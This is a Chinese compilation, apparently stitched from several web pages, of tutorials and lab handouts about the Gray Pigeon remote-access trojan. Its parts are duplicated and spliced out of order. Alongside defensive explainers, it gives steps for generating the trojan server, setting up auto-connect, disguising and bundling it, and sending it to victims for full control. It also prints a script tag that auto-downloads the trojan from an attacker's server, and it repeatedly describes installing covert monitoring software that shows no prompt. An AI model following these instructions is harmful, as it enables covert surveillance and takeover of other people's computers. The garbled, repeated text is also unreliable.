灰鸽子远程控制木马教程

灰鸽子使用教程图解（考虑到灰鸽子技术性较强和传插黑客技术要低调，将网络人远程控制教程放第一部份，灰鸽子教程放在了文章后面第二部份，请大家耐心观看）第一部份：网络人远程监控软件网络人远程控制个人版分为Netman办公版与Netman监控版。

两个版本主要区别在于：Netman办公版连接远程电脑时，对方会弹出提示，知道电脑正在远程连接，主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用，是一款免费的远程控制软件；Netman监控版使用会员登录后再连接，远程电脑无任何提示，对方不会发觉，主要用于监管孩童电脑，掌握孩子上网情况，保护孩子健康上网。

Netman监控版详细安装方法：1.要实现远程监控控制，双方都要安装Netman监控版，双方电脑的安装方法一样，控制端同时也是被控端，只要知道ID和密码，双方可以互相控制。

2.下载软件解压缩后，双击“Netman监控版.EXE”，软件默认安装路径为“C:\Program式，需要自己进入安装文件夹，双击iexplore.exe启动软件，这时会弹出一个提示窗口，问是否要让软件随系统启动，通常直接点“确定”。

3.完成以上操作后，再按ctrl+y即可呼出软件主界面。

监控版必须使用会员登录才能实现监控功能，所以呼出主界面后，应点击免费注册会员。

4.注册好会员后，点“选项”-“会员登录”，填上注册好的会员号。

5.第一次使用会员登录时，会弹出“设置控制密码”选项，需要注意的是，这里修改的不是前面填写的“登录密码”，而是从其他电脑连接本电脑时需要输入的“控制密码”。

很多用户会误以为这里是修改“登录密码”，导致第二次使用会员登录时，发现登录密码不正确。

出于安全考虑，网络人设置了“登录密码”与“控制密码”两道密码保护，“登录密码”用于登录会员ID，“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。

想要修改这两个密码，可点击“选项”-“修改密码”。

6.设置好密码密码后，点右上角的关闭按扭，软件就会在后台运行，桌面上看不到任何图标和提示。

灰鸽子远程控制完整详细教程（考虑到灰鸽子技术性较强和传插黑客技术要低调，将网络人远程控制教程放第一部份，灰鸽子教程放在了文章后面第二部份，请大家耐心观看）第一部份：网络人远程监控软件Netman监控版详细安装方法：1.要实现远程监控控制，双方都要安装Netman监控版，双方电脑的安装方法一样，控制端同时也是被控端，只要知道ID和密码，双方可以互相控制。

2.下载软件解压缩后，双击“Netman监控版.EXE”，软件默认安装路径为“C:\Program Files\Netman”，可以自己修改，但安装路径需要记住，因为启动软件桌面上不会新建快捷方式，需要自己进入安装文件夹，双击iexplore.exe启动软件，这时会弹出一个提示窗口，问是否要让软件随系统启动，通常直接点“确定”。

3.完成以上操作后，再按ctrl+y即可呼出软件主界面。

监控版必须使用会员登录才能实现监控功能，所以呼出主界面后，应点击免费注册会员。

4.注册好会员后，点“选项”-“会员登录”，填上注册好的会员号。

5.第一次使用会员登录时，会弹出“设置控制密码”选项，需要注意的是，这里修改的不是前面填写的“登录密码”，而是从其他电脑连接本电脑时需要输入的“控制密码”。

很多用户会误以为这里是修改“登录密码”，导致第二次使用会员登录时，发现登录密码不正确。

出于安全考虑，网络人设置了“登录密码”与“控制密码”两道密码保护，“登录密码”用于登录会员ID，“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。

想要修改这两个密码，可点击“选项”-“修改密码”。

6.设置好密码密码后，点右上角的关闭按扭，软件就会在后台运行，桌面上看不到任何图标和提示。

想要再次操作软件，请按下ctrl+y键。

右上角的关闭按扭只是将软件界面关闭，想要彻底退出软件，应点击左上角的“文件”-“退出”。

很多用户想要卸载软件时，发现无卸载，就是因为没有退出程序造成。

7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录，在“远程IP/ID”处输入对方的会员ID和控制密码，点击“连接”即可连接远程电脑。

任务名称：灰鸽子木马利用与防护任务目的与要求：了解木马病毒对终端主机的安全威胁，以及木马病毒如何对主机进行攻击。

本次任务要求学生学习灰鸽子木马远程控制软件的使用，通过实验可以了解木马和计算机病毒的区别，熟悉使用木马进行网络攻击的原理和方法。

实验任务涉及到的相关知识：任务环境拓扑：具体步骤：1.登录windows2003，打开灰鸽子软件。

winxpwindows20032.灰鸽子木马共有两个应用程序，其中一个是服务器程序，该程序由客户端配置产生，属于木马受控端程序，种木马时，需将该程序放入到受控端的计算机中，然后双击该程序即可；H_client.exe是木马的客户端程序，属于木马的主控端程序。

首先点击H_client.exe打开客户端，选择“文件-配置服务器”配置服务器端。

点击“生成服务器”即生成了一个服务器端，点击“确定”3.登录到XP系统。

点击“开始”-“运行”，输入“\\192.168.0.46（win2003的IP地址，已在win2003系统下通过ipconfig命令查看为准），可以通过共享查看win2003共享的文件,如图所示，将setup.exe拷贝到XP系统的桌面，然后双击运行。

4.返回win2003，点击“文件”-“增加主机”，输入XP的IP地址192.168.0.43（以在XP下通过ipconfig命令查看到得IP为准），点击确定。

5.双击文件目录浏览下的“我的电脑”，可以查看到主机为192.168.0.43的标识。

然后双击192.168.0.43，可以查看到XP系统的目录及文件。

此时点击C：\Documents and Settings\Administrator\桌面，可以查看到XP左面上放置的文件setup.exe服务器端。

6.右击setup.exse，选择“文件下载至”，然后将该文件保存到win2003的桌面。

此时通过灰鸽子对XP系统的文件进行操作，以及查看XP信息，远程发送命令、编辑注册表、远程监控、命令广播等功能。

浏览网页中木马的原理和防范--灰鸽子网页木马的制作和解析1.网页木马从原理如果你访问××网站（国内某门户网站），你就会中灰鸽子木马。

这是我一黑客朋友给我说的一句说。

打开该网站的首页，经检查，我确实中了灰鸽子。

怎么实现的呢？他说，他侵入了该网站的服务器并在网站主页上挂了网页木马；一些安全专家常说，不要打开陌生人发来的网址，为什么？因为该网址很有可能就是一些不怀好意者精心制作的网页木马。

以上只是网页木马的两种形式，实际上网页木马还可以挂在多媒体文件（RM、RMVB、WMV、WMA、Flash）、电子邮件、论坛等多种文件和场合上。

很可怕吧，那么用户如何防范网页木马呢？下面我们就先从网页木马的攻击原理说起。

一、网页木马的攻击原理首先明确，网页木马实际上是一个HTML网页，与其它网页不同的是该网页是黑客精心制作的，用户一旦访问了该网页就会中木马。

为什么说是黑客精心制作的呢？因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞，让IE在后台自动下载黑客放置在网络上的木马并运行（安装）这个木马，也就是说，这个网页能下载木马到本地并运行（安装）下载到本地电脑上的木马，整个过程都在后台运行，用户一旦打开这个网页，下载过程和运行（安装）过程就自动开始。

有朋友会说，打开一个网页，IE浏览器真的能自动下载程序和运行程序吗？如果IE真的能肆无忌惮地任意下载和运行程序，那天下还不大乱。

实际上，为了安全，IE浏览器是禁止自动下载程序特别是运行程序的，但是，IE浏览器存在着一些已知和未知的漏洞，网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。

下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。

⒈自动下载程序<SCRIPT LANGUAGE="icyfoxlovelace" src="hxxp:///1.exe"></SCRIPT>小提示：代码说明a. 代码中“src”的属性为程序的网络地址，本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序，这段代码能让网页下载该程序到浏览它的电脑上。

灰鸽子远程控制完整详细教程（考虑到灰鸽子技术性较强和传插黑客技术要低调，将网络人远程控制教程放第一部份，灰鸽子教程放在了文章后面第二部份，请大家耐心观看）第一部份：网络人远程监控软件Netman监控版详细安装方法：1.要实现远程监控控制，双方都要安装Netman监控版，双方电脑的安装方法一样，控制端同时也是被控端，只要知道ID和密码，双方可以互相控制。

2.下载软件解压缩后，双击“Netman监控版.EXE”，软件默认安装路径为“C:\Program Files\Netman”，可以自己修改，但安装路径需要记住，因为启动软件桌面上不会新建快捷方式，需要自己进入安装文件夹，双击iexplore.exe启动软件，这时会弹出一个提示窗口，问是否要让软件随系统启动，通常直接点“确定”。

3.完成以上操作后，再按ctrl+y即可呼出软件主界面。

监控版必须使用会员登录才能实现监控功能，所以呼出主界面后，应点击免费注册会员。

4.注册好会员后，点“选项”-“会员登录”，填上注册好的会员号。

5.第一次使用会员登录时，会弹出“设置控制密码”选项，需要注意的是，这里修改的不是前面填写的“登录密码”，而是从其他电脑连接本电脑时需要输入的“控制密码”。

很多用户会误以为这里是修改“登录密码”，导致第二次使用会员登录时，发现登录密码不正确。

出于安全考虑，网络人设置了“登录密码”与“控制密码”两道密码保护，“登录密码”用于登录会员ID，“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。

想要修改这两个密码，可点击“选项”-“修改密码”。

6.设置好密码密码后，点右上角的关闭按扭，软件就会在后台运行，桌面上看不到任何图标和提示。

想要再次操作软件，请按下ctrl+y键。

右上角的关闭按扭只是将软件界面关闭，想要彻底退出软件，应点击左上角的“文件”-“退出”。

很多用户想要卸载软件时，发现无卸载，就是因为没有退出程序造成。

7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录，在“远程IP/ID”处输入对方的会员ID和控制密码，点击“连接”即可连接远程电脑。

灰鸽子病毒的原理和运行方式是怎么样的灰鸽子远程病毒我想谁都不陌生吧?曾经控制着我们电脑，信息恶意传播，你知道灰鸽子病毒的原理和运行方式吗?下面由店铺给你做出详细的灰鸽子病毒的原理和运行方式介绍!希望对你有帮助!灰鸽子病毒的原理和运行方式介绍：灰鸽子远程监控软件分两部分：客户端和服务端。

黑客(姑且这么称呼吧)操纵着客户端，利用客户端配置生成出一个服务端程序。

服务端文件的名字默认为G_Server.exe，然后黑客通过各种渠道传播这个服务端(俗称种木马)。

种木马的手段有很多，比如，黑客可以将它与一张图片绑定，然后假冒成一个羞涩的MM通过QQ把木马传给你，诱骗你运行;也可以建立一个个人网页，诱骗你点击，利用IE漏洞把木马下载到你的机器上并运行;还可以将文件上传到某个软件下载站点，冒充成一个有趣的软件诱骗用户下载……，这正违背了我们开发灰鸽子的目的，所以本文适用于那些让人非法安装灰鸽子服务端的用户，帮助用户删除灰鸽子 Vip 2005 的服务端程序。

本文大部分内容摘自互联网。

G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录，2k/NT下为系统盘的Winnt目录)，然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。

G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端，有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。

注意，G_Server.exe这个名称并不固定，它是可以定制的，比如当定制服务端文件名为A.exe 时，生成的文件就是A.exe、A.dll和A_Hook.dll。

Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启动项)，每次开机都能自动运行，运行后启动G_Server.dll 和G_Server_Hook.dll并自动退出。

灰鸽子木马实验报告一、实验目的及要求[目的]1、了解灰鸽子是一个集多种控制方法于一体的木马病毒。

[内容及要求]1、练习软件的哪些功能2、通过实验了解灰鸽子是一款的远程控制软件。

3、熟悉使用木马进行网络攻击的原理和方法。

[试验环境]虚拟机下安装组建一个局域网 2台安装了win2000/win2003/XP系统的电脑 灰鸽子木马软件。

二、实验方法与步骤:1 打开虚拟机 开启windows server 2003 A与windows server 2003 B 将其网络设备器设置在同一局域网内 例vmnet22 打开灰鸽子 并查看本机IP地址3 点击配置服务程序 新建一个木马病毒密码可设置也可不设置3 将生产的木马病毒设法放入目标主机 并使其运行原始木马样子4 目标主机运行后 本机灰鸽子显示其登录我们可对目标及进行 下载上传等基本运行5 还可以进行更深层次的控制，例如屏幕捕捉与控制，广播，关机开机，注册表的编辑等 （看红框标识处）(6)灰鸽子木马的伪装，木马捆绑器：现今社会杀毒软件的辨识度已然很高，而人们的警惕度也越来越高，木马若想成功的被目标主机运行，必然要做一定的伪装生成一个可执行文件，虽然风险乜很高，但不失为一种方法！6 木马分离器：三、使用心得1 熟悉灰鸽子之后，我们了解了木马的强大以及危害之处，如何防范木马，是当今信息社会的一种不可不重视的问题。

计算机病毒泛滥尤以木马病毒为甚。

木马病毒是一种远程控制程序 “黑客”利用计算机系统和软件的漏洞将一段程序植入远端电脑后，可以借助其配套的控制程序来远程控制中毒电脑 肆无忌惮地查看、下载他人电脑中的内容。

掌握了它的原因，对于防护电脑避免木马入侵我们应该有一定对策2 如何防范木马病毒一、检测网络连接二、禁用不明服务三、轻松检查账户四、及时修补漏洞和关闭可疑的端口五、安装杀毒软件并及时更新六、运行实时监控程序。

灰鸽子使用教程灰鸽子如何使用？
导读:灰鸽子是一款远程控制软件，不过这款软件刚推出的时候是定义为公司和家庭管理的软件，由于软件设计存在缺陷，被黑客恶意使用，使得这款软件被定义为木马程序。

下面给大家介绍灰鸽子的使用教程。

1、先下载灰鸽子软件，大家没有的可以下载灰鸽子软件的；
2、打开后灰鸽子，我们先点击ftp更新我们的动态域名；
3、更新成功在打开配置服务端，写上更新好的域名；
4、这里是运行后服务端释放的目录，大家根据自己的要求来写；
5、这个是选择用什么进程的名字，我这个是使用ie进程；
6、配置好后，就是有一个Server.exe，运行后就可以在主控端里面看到了；
7、主控端显示的界面就是这样的；
灰鸽子这款软件本身是不具备传播性的，一般是他人通过捆绑的方式进行传播，传播方式有网页传播、邮件传播、IM聊天工具传播、非法软件传播。

灰鸽子远程控制完整详细教程（考虑到灰鸽子技术性较强和传插黑客技术要低调，将网络人远程控制教程放第一部份，灰鸽子教程放在了文章后面第二部份，请大家耐心观看）第一部份：网络人远程监控软件Netman监控版详细安装方法：1.要实现远程监控控制，双方都要安装Netman监控版，双方电脑的安装方法一样，控制端同时也是被控端，只要知道ID和密码，双方可以互相控制。

2.下载软件解压缩后，双击“Netman监控版.EXE”，软件默认安装路径为“C:\Program Files\Netman”，可以自己修改，但安装路径需要记住，因为启动软件桌面上不会新建快捷方式，需要自己进入安装文件夹，双击iexplore.exe启动软件，这时会弹出一个提示窗口，问是否要让软件随系统启动，通常直接点“确定”。

3.完成以上操作后，再按ctrl+y即可呼出软件主界面。

监控版必须使用会员登录才能实现监控功能，所以呼出主界面后，应点击免费注册会员。

5.第一次使用会员登录时，会弹出“设置控制密码”选项，需要注意的是，这里修改的不是前面填写的“登录密码”，而是从其他电脑连接本电脑时需要输入的“控制密码”。

很多用户会误以为这里是修改“登录密码”，导致第二次使用会员登录时，发现登录密码不正确。

出于安全考虑，网络人设置了“登录密码”与“控制密码”两道密码保护，“登录密码”用于登录会员ID，“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。

想要修改这两个密码，可点击“选项”-“修改密码”。

6.设置好密码密码后，点右上角的关闭按扭，软件就会在后台运行，桌面上看不到任何图标和提示。

想要再次操作软件，请按下ctrl+y键。

右上角的关闭按扭只是将软件界面关闭，想要彻底退出软件，应点击左上角的“文件”-“退出”。

很多用户想要卸载软件时，发现无卸载，就是因为没有退出程序造成。

7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录，在“远程IP/ID”处输入对方的会员ID和控制密码，点击“连接”即可连接远程电脑。

灰鸽子利用教程图解（考虑到灰鸽子技术性较强和传插黑客技术要低调，将网络人远程控制教程放第一部份，灰鸽子教程放在了文章后面第二部份，请大家耐心观看）第一部份：网络人远程监控软件网络人远程控制个人版分为Netman办公版与Netman监控版。

两个版本主要区别在于：Netman办公版连接远程电脑时，对方会弹出提示，明白电脑正在远程连接，主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面利用，是一款免费的远程控制软件；Netman监控版利用会员登录后再连接，远程电脑无任何提示，对方不会觉察，主要用于监管孩童电脑，掌握孩子上网情形，保护孩子健康上网。

Netman监控版详细安装方式：1.要实现远程监控控制，两边都要安装Netman监控版，两边电脑的安装方式一样，控制端同时也是被控端，只要明白ID和密码，两边能够彼此控制。

2.下载软件解紧缩后，双击“Netman监控版.EXE”，软件默许安装路径为“C:\Program Files\Netman”，能够自己修改，但安装路径需要记住，因为启动软件桌面上不会新建快捷方式，需要自己进入安装文件夹，双击启动软件，这时会弹出一个提示窗口，问是不是要让软件随系统启动，通常直接点“肯定”。

3.完成以上操作后，再按ctrl+y即可呼出软件主界面。

监控版必需利用会员登录才能实现监控功能，所以呼出主界面后，应点击免费注册会员。

4.注册好会员后，点“选项”-“会员登录”，填上注册好的会员号。

5.第一次利用会员登录时，会弹出“设置控制密码”选项，需要注意的是，这里修改的不是前面填写的“登录密码”，而是从其他电脑连接本电脑时需要输入的“控制密码”。

很多用户会误以为这里是修改“登录密码”，致使第二次利用会员登录时，发觉登录密码不正确。

出于安全考虑，网络人设置了“登录密码”与“控制密码”两道密码保护，“登录密码”用于登录会员ID，“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。

灰鸽⼦⽊马使⽤教程使⽤灰鸽⼦⽊马控制⼀台电脑
灰鸽⼦简介：
灰鸽⼦是国内⼀款著名后门。

⽐起前辈冰河、⿊洞来，灰鸽⼦可以说是国内后门的集⼤成者。

其丰富⽽强⼤的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。

客户端简易便捷的操作使刚⼊门的初学者都能充当⿊客。

当使⽤在合法情况下时，灰鸽⼦是⼀款优秀的远程控制软件。

但如果拿它做⼀些⾮法的事，灰鸽⼦就成了很强⼤的⿊客⼯具。

使⽤教程：
1、⾸先，在电脑上安装灰鸽⼦，然后进⼊其主页⾯
2、接下来我们点⾃动上线FTP服务器就是你FTP空间的地址
3、下来点配置服务程序，先点⾃动上线设置，IP通知那⾥添上你FTP在HTTP的访问地址加上你放IP⽂件的地址
4、最终我们要把服务器配置成功
5、然后只要把服务端发送给别⼈，别⼈运⾏之后，就可以完全的控制别⼈的电脑了
以上带⼤家了解⽊马病毒对我们的危害以及著名⽊马灰鸽⼦的使⽤原理，并对其原理进⾏深⼊研究。

灰鸽子木马利用与防护(SEC-W06-001.1)木马，又名特洛伊木马，其名称取自古希腊神话的特洛伊木马记，它是一种基于远程控制的黑客工具，具有很强的隐蔽性和危害性。

为了达到控制服务端主机的目的，木马往往要采用各种手段达到激活自己、加载运行的目的。

本案例以国内著名的灰鸽子木马为例讲述木马的使用和防御。

实验目的●了解木马病毒对终端主机的安全威胁，以及木马病毒如何对主机进行攻击。

实验准备●准备两台电脑，一台为服务器（win2003）和一台为winxp电脑：Win2003 服务器的设置：1．设置IP地址为192.168.25.772．右击我的电脑，选择管理，选择本地用户和组---用户---administrator,设置其密码为demo 3．右击我的电脑，选择属性---远程选项卡，勾选远程桌面下的允许用户远程连接到这台计算机。

（开启了3389端口，通过netstat –an 可以查看）客户机(win xp)：设置其IP地址为192.168.25.78●请下载灰鸽子木马程序(本案例使用的是灰鸽子牵手版)到个人PC(winxp电脑)上。

（把木马程序放在winxp电脑上）如图1如图1●在个人PC上运行远程桌面客户端程序mstsc.exe，输入服务器IP地址192.168.25.77，点击“连接”，登录时用户名为“administrator”，密码为“demo”。

如图2图2●登入远程虚拟平台之后，在服务器上建立“新建文件夹”，重命名为“share”，然后右击文件夹，选择“属性”，在“共享”栏中，选择“共享该文件夹” 。

如图3图3为了通过网络共享从本地拷贝文件到虚拟平台，确认控制权限为“完全控制”。

如图4图4以上操作的目的是，为了以后把winxp上生成的服务端程序拷贝到服务器的共享文件夹share 中。

实验步骤下载使用灰鸽子木马步骤说明：下载和使用灰鸽子木马1.在winxp电脑上，打开已经下载好的灰鸽子木马所在的文件夹qs2004，双击里面的灰鸽子客户端H_client(本案例中如果碰到灰鸽子客户端无法打开的情形，请从“灰鸽子_牵手.zip”重新解压生成一个新的客户端程序再执行）。

灰鸽子破解版教程（考虑到灰鸽子技术性较强和传插黑客技术要低调，将网络人远程控制教程放第一部份，灰鸽子教程放在了文章后面第二部份，请大家耐心观看）第一部份：网络人远程监控软件网络人远程控制个人版分为Netman办公版与Netman监控版。

两个版本主要区别在于：Netman办公版连接远程电脑时，对方会弹出提示，知道电脑正在远程连接，主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用，是一款免费的远程控制软件；Netman监控版使用会员登录后再连接，远程电脑无任何提示，对方不会发觉，主要用于监管孩童电脑，掌握孩子上网情况，保护孩子健康上网。

Netman监控版详细安装方法：1.要实现远程监控控制，双方都要安装Netman监控版，双方电脑的安装方法一样，控制端同时也是被控端，只要知道ID和密码，双方可以互相控制。

2.下载软件解压缩后，双击“Netman监控版.EXE”，软件默认安装路径为“C:\Program Files\Netman”，可以自己修改，但安装路径需要记住，因为启动软件桌面上不会新建快捷方式，需要自己进入安装文件夹，双击iexplore.exe启动软件，这时会弹出一个提示窗口，问是否要让软件随系统启动，通常直接点“确定”。

3.完成以上操作后，再按ctrl+y即可呼出软件主界面。

监控版必须使用会员登录才能实现监控功能，所以呼出主界面后，应点击免费注册会员。

4.注册好会员后，点“选项”-“会员登录”，填上注册好的会员号。

5.第一次使用会员登录时，会弹出“设置控制密码”选项，需要注意的是，这里修改的不是前面填写的“登录密码”，而是从其他电脑连接本电脑时需要输入的“控制密码”。

很多用户会误以为这里是修改“登录密码”，导致第二次使用会员登录时，发现登录密码不正确。

出于安全考虑，网络人设置了“登录密码”与“控制密码”两道密码保护，“登录密码”用于登录会员ID，“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。

木马灰鸽子防护场景灰鸽子是国内一个著名的后门程序。

灰鸽子变种木马运行后，会自我复制到Windows目录下，并自行将安装程序删除。

修改注册表，将病毒文件注册为服务项实现开机自启。

木马程序还会注入所有的进程中，隐藏自我，防止被杀毒软件查杀。

自动开启IE浏览器，以便与外界进行通信，侦听黑客指令，在用户不知情的情况下连接黑客指定站点，盗取用户信息、下载其它特定程序。

通过对灰鸽子的运行过程及原理进行了解，掌握对木马的防御实验目标●掌握木马的原理●通过木马对主机控制过程的了解，掌握防御方法●树立安全的防范意识●可以根据环境要求设定有效的防范策略实验拓扑VM Server VM Client实验环境Server：Windows XP[服务端]（因实验需要 Server 服务端登录账户：administrator，密码：123456）Client：Windows XP[客户端]灰鸽子[企业版]Server_Setup.exe服务端木马(可由灰鸽子生成)灰鸽子专杀工具[工具]利用灰鸽子进行控制灰鸽子木马程序版本众多，这里我们选择了使用较多的“灰鸽子远程管理企业版Build060228”版本。

【注释】安装灰鸽子客户端程序，目的为了控制被种植了灰鸽子服务端程序的肉鸡，客户端本身没有危害性。

1.在客户端上运行“灰鸽子[企业版]”程序，主界面如图 1：(图1)2.点击工具栏中的“配置服务程序”按钮，弹出如图2对话框，可根据自己要求定制生成服务端程序，用于种植在肉鸡中。

(图2)【注释】用户可以定制肉鸡服务端开放的端口、连接密码、控制权限等。

自动上线功能可以在肉鸡启动时，自动告知控制者上线信息。

3.添加好相应的信息后,点击“生成服务器”按钮，可以生成EXE可执行程序。

这里我们在C盘根目录已经提供了一个生成好的服务端程序Server_Setup.exe，其连接端口为7812，连接密码为7812，具有所有控制权限。

4.把生成的Server_Setup.exe通过网络共享方式复制至服务端上，并在服务器上双击运行该程序。

灰鸽子木马原理一、什么是灰鸽子木马灰鸽子木马是一种具有高度隐蔽性和持久性的远程控制软件。

它通常通过钓鱼邮件、恶意下载和网络漏洞利用等方式传播，目的是植入受害者计算机系统，并使黑客能够远程控制和监控计算机。

灰鸽子木马得名于它使用灰鸽子作为其标志性图标。

二、灰鸽子木马的传播方式1.钓鱼邮件：黑客通过发送看似合法和诱人的邮件，含有携带灰鸽子木马的附件或恶意链接。

当受害者打开附件或点击链接时，木马会悄悄地进入系统。

2.恶意下载：黑客会在一些不安全的网站上发布包含恶意代码的软件或文件。

当用户在这些网站上下载并安装软件时，木马就会感染受害者的计算机系统。

3.网络漏洞利用：黑客会利用已知的系统漏洞来传播灰鸽子木马。

他们通过扫描网络，寻找可利用的漏洞，并通过这些漏洞远程感染受害者的计算机。

三、灰鸽子木马的工作原理灰鸽子木马主要包括三个核心部分：客户端程序、服务器端程序和控制面板。

1.客户端程序：客户端程序是指感染了受害者计算机的木马程序。

一旦成功感染，客户端程序便开始在计算机中植入和运行。

它通过窃取敏感信息或监控用户行为来完成黑客的意图。

2.服务器端程序：服务器端程序是黑客控制灰鸽子木马的中央管理系统。

黑客使用服务器端程序来监控和控制感染了客户端程序的计算机。

3.控制面板：控制面板是黑客使用的用户界面，它允许黑客查看和操纵感染了灰鸽子木马的客户端计算机。

通过控制面板，黑客可以发送指令、收集信息和执行各种操作。

灰鸽子木马主要通过以下方式实现远程操控和监控：1.启动自动运行：灰鸽子木马会在感染计算机时添加自启动项，确保在计算机启动时自动运行，以保持持久性。

2.反向连接：客户端程序会与服务器端程序建立一个隐藏的反向连接，使黑客能够远程访问受感染计算机的指令和数据。

3.远程执行命令：黑客可以通过控制面板发送指令给感染了灰鸽子木马的客户端计算机，实现远程执行命令。

4.收集敏感信息：客户端程序可以记录受害者的键盘输入、屏幕截图和网络流量等信息，并将其传输到服务器端程序。

实验五灰鸽子远程控制1、实验背景灰鸽子远程监控软件分两部分：客户端和服务端。

黑客操纵着客户端，利用客户端配置生成出一个服务端程序。

服务端文件的名字默认为G_Server.exe，然后黑客通过各种渠道传播这个服务端(俗称种木马)。

种木马的手段有很多，比如，黑客可以将它与一张图片绑定，然后假冒成一个羞涩的MM通过QQ把木马传给你，诱骗你运行；也可以建立一个个人网页，诱骗你点击，利用IE漏洞把木马下载到你的机器上并运行；还可以将文件上传到某个软件下载站点，冒充成一个有趣的软件诱骗用户下载……。

G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录，2k/NT下为系统盘的Winnt目录)，然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。

G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端，有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。

值得注意的是，G_Server.exe这个名称并不固定，它是可以定制的，比如当定制服务端文件名为A.exe时，生成的文件就是A.exe、A.dll和A_Hook.dll。

Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启动项)，每次开机都能自动运行，运行后启动G_Server.dll和G_Server_Hook.dll并自动退出。

G_Server.dll文件实现后门功能，与控制端客户端进行通信；G_Server_Hook.dll则通过拦截API调用来隐藏病毒。

因此，中毒后，我们看不到病毒文件，也看不到病毒注册的服务项。

随着灰鸽子服务端文件的设置不同，G_Server_Hook.dll有时候附在Explorer.exe 的进程空间中，有时候则是附在所有进程中。

实验三木马及远程控制技术练习一网页木马一、实验目的该实验为设计性实验。

✧剖析网页木马的工作原理✧理解木马的植入过程✧学会编写简单的网页木马脚本✧通过分析监控信息实现手动删除木马二、实验内容1.木马生成与植入2.利用木马实现远程控制3.木马的删除注：详细实验操作请参考实验室服务器上的参考资料。

三、实验步骤本练习主机A、B为一组，C、D为一组，E、F为一组。

实验角色说明如下：下面以主机A、B为例，说明实验步骤。

首先使用“快照X”恢复Windows系统环境。

（一）木马生成与植入在进行本实验步骤之前，我们再来阐述一下用户主机通过访问被“挂马”的网站而被植入木马的过程，便于同学们理解和完成实验。

（1）用户访问被“挂马”的网站主页。

（此网站是安全的）（2）“挂马”网站主页中的<iframe>代码链接一个网址（即一个网页木马），使用户主机自动访问网页木马。

（通过把<iframe>设置成不可见的，使用户无法察觉到这个过程）（3）网页木马在得到用户连接后，自动发送安装程序给用户。

（4）如果用户主机存在MS06014漏洞，则自动下载木马安装程序并在后台运行。

（5）木马安装成功后，木马服务端定时监测控制端是否存在，发现控制端上线后立即弹出端口主动连接控制端打开的被动端口。

（6）客户端收到连接请求，建立连接。

1．生成网页木马（1）主机A首先通过Internet信息服务(IIS)管理器启动“木马网站”。

（2）主机A进入实验平台在工具栏中单击“灰鸽子”按钮运行灰鸽子远程监控木马程序。

（3）主机A生成木马的“服务器程序”。

主机A单击木马操作界面工具栏“配置服务程序”按钮，弹出“服务器配置”对话框,单击“自动上线设置”属性页，在“IP通知http访问地址、DNS解析域名或固定IP”文本框中输入本机IP地址，在“保存路径”文本框中输入“D:\Work\IIS\Server_Setup.exe”，单击“生成服务器”按钮，生成木马“服务器程序”。